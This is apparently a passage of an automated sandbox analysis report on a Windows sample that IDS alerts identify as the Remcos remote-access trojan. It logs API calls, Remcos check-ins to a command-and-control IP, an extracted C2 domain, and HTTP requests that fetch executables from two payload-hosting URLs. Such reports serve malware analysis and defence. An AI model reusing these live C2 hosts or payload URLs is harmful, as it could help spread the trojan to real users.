                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426864 FindFirstFileW,FindClose,0_2_00426864
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,4_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0044D5E9 FindFirstFileExA,4_2_0044D5E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,4_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00406AC2 FindFirstFileW,FindNextFileW,4_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,4_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,4_2_00408DA7
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeCode function: 5_2_004062D5 FindFirstFileW,FindClose,5_2_004062D5
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeCode function: 5_2_00402E18 FindFirstFileW,5_2_00402E18
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeCode function: 5_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00406C9B
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001EE334 GetFileAttributesW,FindFirstFileW,FindClose,23_2_001EE334
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001FA32C FindFirstFileW,Sleep,FindNextFileW,FindClose,23_2_001FA32C
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001F65AE FindFirstFileW,FindNextFileW,FindClose,23_2_001F65AE
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001BC6C2 FindFirstFileExW,23_2_001BC6C2
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001F7205 FindFirstFileW,FindClose,23_2_001F7205
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001F72A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,23_2_001F72A6
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001ED7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_001ED7CC
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001EDB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_001EDB0B
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001F9E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_001F9E43
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001F9F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_001F9F9E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00406F06
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\88473\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\88473Jump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49755 -> 181.141.40.225:3020
                    Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 181.141.40.225:3020 -> 192.168.2.5:49755
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50061 -> 181.141.40.225:3021
                    Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 181.141.40.225:3021 -> 192.168.2.5:50061
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: oportunidad-escolombiasegura.cfd
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 181.141.40.225 ports 3021,3020,0,1,2,3,30201
                    Source: global trafficTCP traffic: 192.168.2.5:49728 -> 181.141.40.225:30201
                    Source: global trafficHTTP traffic detected: GET /zmouse.exe HTTP/1.1Host: contath.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RacingLot.exe HTTP/1.1Host: bhcc.com.saConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: EPMTelecomunicacionesSAESPCO EPMTelecomunicacionesSAESPCO
                    Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49764 -> 178.237.33.50:80
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:50063 -> 178.237.33.50:80
                    Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49748 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040455B WaitForSingleObject,SetEvent,recv,4_2_0040455B
                    Source: global trafficHTTP traffic detected: GET /zmouse.exe HTTP/1.1Host: contath.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RacingLot.exe HTTP/1.1Host: bhcc.com.saConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: oportunidad-escolombiasegura.cfd
                    Source: global trafficDNS traffic detected: DNS query: contath.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: global trafficDNS traffic detected: DNS query: bhcc.com.sa
                    Source: global trafficDNS traffic detected: DNS query: QxbVNDtCpHrITON.QxbVNDtCpHrITON
                    Source: global trafficDNS traffic detected: DNS query: comercio0025.dns.army
                    Source: csc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bhcc.com.sa
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F61000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: csc.exe, 00000002.00000002.4532919919.0000000007149000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://contath.org
                    Source: ywezrgl.exe, 00000005.00000003.2372891736.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2849107659.0000000002061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                    Source: ywezrgl.exe, 00000005.00000003.2372891736.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2849107659.0000000002061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                    Source: ywezrgl.exe, 00000005.00000003.2372891736.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2849107659.0000000002061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                    Source: ywezrgl.exe, 00000005.00000003.2372891736.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2849107659.0000000002061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F61000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: ywezrgl.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpGr
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpbr
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpq
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe, 00000005.00000002.2428450495.0000000000408000.00000002.00000001.01000000.00000008.sdmp, ywezrgl.exe, 00000005.00000000.2329859407.0000000000408000.00000002.00000001.01000000.00000008.sdmp, ywezrgl.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe.2.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe.2.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F61000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe.2.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: ywezrgl.exe, 00000005.00000003.2372891736.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2849107659.0000000002061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                    Source: ywezrgl.exe, 00000005.00000003.2372891736.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2849107659.0000000002061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                    Source: ywezrgl.exe, 00000005.00000003.2372891736.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2849107659.0000000002061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: csc.exe, 00000002.00000002.4534522380.00000000095C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoftR
                    Source: csc.exe, 00000002.00000002.4532919919.0000000007151000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: ywezrgl.exe, 00000005.00000003.2372891736.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2849107659.0000000002061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                    Source: ywezrgl.exe, 00000005.00000003.2372891736.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2849107659.0000000002061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                    Source: ywezrgl.exe, 00000005.00000003.2372891736.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000000.2416940254.0000000000745000.00000002.00000001.01000000.0000000A.sdmp, MusesSync.scr, 00000017.00000002.2491456688.0000000000255000.00000002.00000001.01000000.0000000C.sdmp, MusesSync.scr, 0000001A.00000000.2565892972.0000000000255000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: csc.exe, 00000002.00000002.4532919919.0000000006F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bhcc.c4
                    Source: csc.exe, 00000002.00000002.4532919919.0000000006EF6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bhcc.com.sa
                    Source: csc.exe, 00000002.00000002.4532919919.0000000006F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bhcc.com.sa/RacingLot.exe
                    Source: csc.exe, 00000002.00000002.4532919919.000000000712D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contath.org
                    Source: csc.exe, 00000002.00000002.4532919919.0000000006F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contath.org/zmouse.exe
                    Source: csc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: csc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: csc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: csc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: csc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: csc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: ywezrgl.exe, 00000005.00000003.2372891736.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2849107659.0000000002061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                    Source: Defensive.pif, 0000000F.00000003.2849107659.0000000002061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: ywezrgl.exe, 00000005.00000003.2372891736.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2849107659.0000000002061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
